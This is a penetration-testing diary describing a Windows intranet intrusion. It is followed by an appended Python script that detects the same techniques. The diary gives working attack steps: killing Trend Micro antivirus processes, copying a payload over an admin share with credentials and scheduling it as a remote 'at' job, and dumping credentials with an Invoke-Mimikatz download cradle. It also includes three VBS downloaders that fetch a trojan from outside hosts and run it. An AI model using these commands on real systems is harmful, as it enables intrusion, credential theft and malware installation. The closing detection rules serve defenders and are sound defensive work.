An Intranet Penetration Diary
Penetration summary:
The environment was on the 172.x range. I had a shell, but the host was fully patched, the web server and database were separated, and 360 (the AV) put me in my place within minutes. I uploaded a big webshell and ran the usual set of net commands: there was a domain, and the database happened to sit in the domain's segment. At that point I wanted to run cmdshell through MSSQL to plant a trojan (in fact I had already taken several servers through MSSQL, but I felt that accessing them from the webshell was not going to work).
Options: VBS downloader, bitsadmin download, IPC connection and copying the file over.
1. bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\p.zip (not present on Win03; copying the Win7 one over does not work).
2. VBS downloader: I echoed out and ran all the commands and found that execution timed out. Trend Micro firewall. Running as SYSTEM I used taskkill /f /t /im pid to end the process, and ended up killing the MSSQL process instead (slip of the hand).
There were roughly four processes:
NTRtScan.exe 1964 ntrtscan
PccNTMon.exe 3924 (not recorded)
CNTAoSMgr.exe 296 (not recorded)
PccNTMon.exe 5452 (not recorded)
IPC: net use \\10.1.111.1\c$ "dc\username" /user:"password"
copy path\xx.exe \\10.xxxx\c$\xx.exe
net time \\ip
at time \\ip\C$\x.exe (the classic technique)
Next steps:
Look at the shell for privilege escalation: overflows, MSSQL, FTP; gather more information, such as mail and so on.
Determine whether the intranet machines controlled over these two days run any web services; if they do, the rest will be easy.
Try privilege escalation with msf + Cobalt Strike + Veil.
PowerShell credential dumping:
powershell
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > C:\programdata\pass.txt"
Running commands: psexec
https://technet.microsoft.com/en-us/sysinternals/bb897553
https://github.com/nick-o/impacket
Three versions of the VBS downloader:

1. VBS downloader:

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.03389.com/muma.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\zl.exe",2
wscript.sleep 1000
Shell.Run ("c:\zl.exe") ' run the downloaded file after the delay

2. Version written out from cmd:

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://www.03389.com/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:\zl.exe") >>zl.vbs

3. wget.vbs:

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2

Usage: cscript wget.vbs http://www.moonsec.com/muma.exe
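From the defender's side, every step in this diary leaves a distinctive process command line. The following Python script is an added example, not part of the original writeup: it runs detection patterns for the techniques above (bitsadmin transfer, VBS downloader echoed to disk, script host fetching a URL, admin-share mapping with explicit credentials, remote at job, PowerShell download cradle, Invoke-Mimikatz, taskkill against the Trend Micro processes listed earlier) over constructed process-creation command lines. The sample lines and the example.invalid hosts are constructed for the demo; the AV process names come from the writeup.

```python
import re

# Constructed sample process command lines (not real logs): one per technique
# from the writeup, plus two benign lines as controls that must not fire.
SAMPLE_CMDLINES = [
    r"bitsadmin /rawreturn /transfer getfile http://example.invalid/p.zip c:\p.zip",
    r'cmd.exe /c echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs',
    r"cscript wget.vbs http://example.invalid/muma.exe c:\zl.exe",
    r'net use \\10.1.111.1\c$ "dc\username" /user:"password"',
    r"at \\10.1.111.1 13:05 \\10.1.111.1\C$\x.exe",
    r"powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds",
    r"taskkill /f /t /im NTRtScan.exe",
    r"net use \\fileserver\share /user:corp\alice",  # ordinary share mapping, no admin share
    r"cscript //nologo logon.vbs",                    # logon script without a URL
]

# Detection rules as (name, regex); each is keyed to one technique in the writeup.
RULES = [
    ("bitsadmin_download", re.compile(r"\bbitsadmin\b.*/transfer\b.*https?://", re.I)),
    ("vbs_downloader_written", re.compile(r"\becho\b.*(Msxml2\.XMLHTTP|Microsoft\.XMLHTTP|ADODB\.Stream).*>>.*\.vbs", re.I)),
    ("script_host_with_url", re.compile(r"\b[cw]script(\.exe)?\b.*https?://", re.I)),
    ("admin_share_explicit_creds", re.compile(r"\bnet\s+use\s+\\\\[^\s]+\\[a-z]\$.*/user:", re.I)),
    ("remote_at_job", re.compile(r"^\s*at\s+\\\\\S+", re.I)),
    ("powershell_download_cradle", re.compile(r"\bpowershell\b.*\bIEX\b.*DownloadString", re.I)),
    ("mimikatz_invocation", re.compile(r"Invoke-Mimikatz|sekurlsa", re.I)),
    ("av_process_kill", re.compile(r"\btaskkill\b.*/f\b.*(NTRtScan|PccNTMon|CNTAoSMgr)", re.I)),
]


def detect(cmdlines):
    """Return (rule_name, cmdline) for every rule that matches each command line."""
    hits = []
    for line in cmdlines:
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, line))
    return hits


def summarize(cmdlines):
    """Count hits per rule, a quick triage view of which techniques were seen."""
    counts = {}
    for name, _ in detect(cmdlines):
        counts[name] = counts.get(name, 0) + 1
    return counts


if __name__ == "__main__":
    for name, line in detect(SAMPLE_CMDLINES):
        print(f"[{name}] {line}")
```

The PowerShell line fires two rules (the download cradle and the Invoke-Mimikatz name), which is the intended behaviour: stacking weak signals on one command line is what makes the alert worth a look.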